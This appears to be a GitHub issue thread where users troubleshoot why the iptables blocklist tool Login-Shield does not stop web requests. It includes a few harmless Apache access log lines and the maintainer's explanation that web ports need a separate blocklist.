<sld>.<tld>:80 185.156.73.64 - - [01/May/2021:12:51:01 +0200] "GET / HTTP/1.0" 301 673 "-" "\"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36\""
<sld>.<tld>:80 89.248.170.22 - - [01/May/2021:12:53:10 +0200] "HEAD / HTTP/1.0" 301 341 "-" "-"
<sld>.<tld>:80 91.211.251.148 - - [01/May/2021:12:54:59 +0200] "GET / HTTP/1.1" 301 710 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36,gzip(gfe)"

Don't know what to think of.

DPsystems commented 3 years ago

Note that unless you're blocking ports 80/443, Login-Shield by default isn't stopping web attacks.

HOWEVER, I AM working on another version called "Web-Shield" with a different set of blacklists to address this issue. I've been testing it now for months and I'm pretty close to making it available.

I think ideally, the web defense needs to be separate from the login-defense. To block web attacks you primarily want to block the web ports from servers, not users, so it needs a bit of a different IP database.

DPsystems commented 3 years ago

If you're still having issues, remember to note the version/OS you're using. See if you can confirm iptables is logging the blocked requests and what form those log entries are appearing as?

ychaouche commented 3 years ago

@aakerbeere did you uncomment this line ? otherwise login-shield won't block anything.

aakerbeere commented 3 years ago

The line is actually uncommented on the devices local instance of ".../set-iptables.sh" but not on ".../set-iptables.sh-config"

ychaouche commented 3 years ago

@aakerbeere ssh on port 22 ?